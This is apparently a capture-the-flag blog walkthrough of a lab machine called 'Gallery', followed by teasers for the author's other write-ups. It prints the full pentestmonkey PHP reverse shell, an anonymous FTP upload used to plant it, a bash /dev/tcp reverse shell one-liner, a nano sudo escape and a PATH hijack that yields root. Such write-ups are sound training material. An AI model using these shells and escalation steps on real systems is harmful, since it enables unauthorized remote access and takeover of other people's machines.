GALLERY MACHINE

 GALLERY

┌──(root㉿kali)-[/home/luis/Descargas/galeria]
└─# bash auto_deploy.sh galeria.tar

                        ##        .         
                  ## ## ##       ==         
               ## ## ## ##      ===         
           /""""""""""""""""\___/ ===       
      ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
           \______ o          __/           
             \    \        __/            
              \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___]
                                         
                     

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

First of all, we have to execute this command and we should see if there is connectivity between both machines as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ping -c3 172.17.02
PING 172.17.02 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.204 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.037 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.054 ms

--- 172.17.02 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2037ms
rtt min/avg/max/mdev = 0.037/0.098/0.204/0.075 ms

┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 172.17.0.2 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 07:53 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
Initiating ARP Ping Scan at 07:53
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 07:53, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:53
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 07:53, 1.33s elapsed (65535 total ports)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.15s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000070s latency).
Scanned at 2025-09-06 07:53:04 CEST for 1s
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Gallery
MAC Address: 02:42:AC:11:00:02 (Unknown)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Here, we can see this webpage whose name is Gallery but nothing else.


Now as we know the open port which is 80 (HTTP), we should see different directories, folders etc with this command which you can see below.
┌──(root㉿kali)-[/home/luis]
└─# gobuster dir -u "http://172.17.0.2/"  -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x baak,txt,php,tar
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              tar,baak,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/gallery              (Status: 301) [Size: 310] [--> http://172.17.0.2/gallery/]
/server-status        (Status: 403) [Size: 275]
Progress: 1102785 / 1102785 (100.00%)
===============================================================
Finished
===============================================================

































In addition, we must create reverse shell as you can see below you can below. This reverse shell has been created by this GitHub repository which you can discover here:


<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '172.17.0.1';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

Now,  we must see if it's possible attack port 21 as you can se below with the nmap command. 
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p 21 --min-rate 5000 -sC 172.17.0.2 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 08:10 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
Initiating ARP Ping Scan at 08:10
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 08:10, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:10
Scanning 172.17.0.2 [1 port]
Discovered open port 21/tcp on 172.17.0.2
Completed SYN Stealth Scan at 08:10, 0.02s elapsed (1 total ports)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:10
NSE: [ftp-bounce 172.17.0.2:21] PORT response: 500 Illegal PORT command.
Completed NSE at 08:10, 0.18s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000048s latency).
Scanned at 2025-09-06 08:10:14 CEST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 172.17.0.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
MAC Address: 02:42:AC:11:00:02 (Unknown)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Now we should be able to enter into the machine with the default credentials which are:
user: anonymous password as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ftp 172.17.0.2
Connected to 172.17.0.2.
220 (vsFTPd 3.0.5)
Name (172.17.0.2:luis): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xrwx    1 ftp      ftp          4096 Mar 30 06:44 ftp
-rw-r--r--    1 ftp      ftp        335070 Mar 27 22:57 image_1.jpg
-rw-r--r--    1 ftp      ftp        442122 Mar 27 22:57 image_2.jpg
-rw-r--r--    1 ftp      ftp        459934 Mar 27 22:57 image_3.jpg
-rw-r--r--    1 ftp      ftp        319652 Mar 27 22:57 image_4.jpg
-rw-r--r--    1 ftp      ftp        480742 Mar 27 22:57 image_5.jpg
-rw-r--r--    1 ftp      ftp        493404 Mar 27 22:57 image_6.jpg
-rw-r--r--    1 ftp      ftp        434472 Mar 27 22:57 image_7.jpg
226 Directory send OK.

Now, we have to try if it's possible upload file to ftp server as you can see below with the command: echo (create file) and put (upload file) as you can see below from terminal and from website.

┌──(luis㉿kali)-[~]
└─$ echo "prueba" >text.php
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xrwx    1 ftp      ftp          4096 Mar 30 06:44 .
drwxr-xr-x    1 ftp      ftp          4096 Mar 30 05:15 ..
226 Directory send OK.
ftp> put text.php
local: text.php remote: text.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
100% |*********************************************************************************|     7        3.72 KiB/s    00:00 ETA
226 Transfer complete.
7 bytes sent in 00:00 (2.28 KiB/s)



ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp             7 Sep 06 06:18 text.php
226 Directory send OK.

Now, as we can upload shell to ftp server as you can see below with the command: put reverse.php (upload file) as you can see below.

ftp> put reverse.php
local: reverse.php remote: reverse.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
100% |*********************************************************************************|  2590       19.44 MiB/s    00:00 ETA
226 Transfer complete.
2590 bytes sent in 00:00 (5.40 MiB/s)

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          2590 Sep 06 06:21 reverse.php
-rw-r--r--    1 ftp      ftp             7 Sep 06 06:18 text.php

Now, we have to open port and then we should be able obtain the shell in attacker machine as you can see below.
┌──(luis㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 50812
Linux 4f8d34fa037a 6.12.38+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.38-1kali1 (2025-08-12) x86_64 x86_64 x86_64 GNU/Linux
 00:22:54 up 43 min,  0 user,  load average: 0.41, 0.78, 1.84
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell

Now, we must execute the next commands to create persistence in the machine you can see below which are:
  1. script /dev/null -c bash
  2.  ^Z
  3. stty raw -echo;fg 
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=BASH
www-data@4f8d34fa037a:/$
www-data@4f8d34fa037a:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@4f8d34fa037a:/$ ^Z
zsh: suspended  nc -lvnp 443
                                                                                                                              
┌──(luis㉿kali)-[~]
└─$ stty raw -echo;fg
[1]  + continued  nc -lvnp 443
                              reset xterm
www-data@4f8d34fa037a:/$ export SHELL=bash
www-data@4f8d34fa037a:/$ export TERM=xterm

Now, as we have persistence in the machine should start the privilege escalation with the first command which is the next as you can see below.
www-data@4f8d34fa037a:/$ sudo -l
Matching Defaults entries for www-data on 4f8d34fa037a:
    env_reset, mail_badpass, use_pty

We as see the gallery user should be able to convert in this user and we have to the gtobins website and obtain more information as you can see below.


User www-data may run the following commands on 4f8d34fa037a:
    (gallery) NOPASSWD: /bin/nano
    (www-data) NOPASSWD: /bin/nano

This is the steps as you can see below.
Control +R
Control +X
Command to execute: reset; sh 1>&0 2>&0

Now, we have to execute this command to obtain reverse shell again as you can see below but before, we have to do again the persistent before.
 
First of all, we have to go to this webpage you can see in the picture below in this link:


Now, we have to execute shell as you can see below and then we have to open port 4444 with the netcat toolkit.
gallery@4f8d34fa037a:/$ bash -i >& /dev/tcp/172.17.0.1/4444 0>&1
┌──(luis㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 47154
gallery@4f8d34fa037a:/$

Now, we have to execute sudo -l to see perms in the Linux system and then let's go to obtain the root session 
gallery@4f8d34fa037a:/$ sudo -l
sudo -l
Matching Defaults entries for gallery on 4f8d34fa037a:
    env_reset, mail_badpass, env_keep+=PATH, use_pty

User gallery may run the following commands on 4f8d34fa037a:
    (ALL) NOPASSWD: /usr/local/bin/runme

Now, we must execute the next commands to create persistence in the machine you can see below which are:
  1. script /dev/null -c bash
  2.  ^Z
  3. stty raw -echo;fg 
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=BASH
gallery@b1895c78583f:/$ script /dev/null -c bash
script /v/null -c bash
Script started, output log file is '/v/null'.
script: cannot open /v/null: No such file or directory
Script done.
gallery@b1895c78583f:/$ ^Z
zsh: suspended  nc -lvnp 4444
                                                                                                                                                                                         
┌──(luis㉿kali)-[~]
└─$ stty raw -echo;fg
[1]  + continued  nc -lvnp 4444
                               reset xterm

Now, we have to execute strings command which we will see how we can obtain root session as you can see below

gallery@4f8d34fa037a:/$ strings /usr/local/bin/runme
Converting image...
convert /var/www/html/gallery/uploads/images/input.png /var/www/html/gallery/uploads/images/output.jpg
gallery@4f8d34fa037a:/$ convert
convert
bash: convert: command not found
gallery@4f8d34fa037a:/$ sudo /usr/local/bin/runme
sudo /usr/local/bin/runme
sh: 1: convert: not found
Converting image...
Done.

We must do the next steps and create convert command in the Linux Path as you can see below
  •  nano convert
  • chmod 777 convert
  • export PATH=.:$PATH
  • echo $PATH
  • sudo /usr/local/bin/runme
gallery@b1895c78583f:/tmp$ nano convert
gallery@b1895c78583f:/tmp$ chmod 777 convert
gallery@b1895c78583f:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
gallery@b1895c78583f:/tmp$ export PATH=.:$PATH
gallery@b1895c78583f:/tmp$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User gallery may run the following commands on b1895c78583f:
    (ALL) NOPASSWD: /usr/local/bin/runme
gallery@b1895c78583f:/tmp$ sudo /usr/local/bin/runme

Gotcha! we have been converted in root 
Converting image...
root@b1895c78583f:/tmp#
 
I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »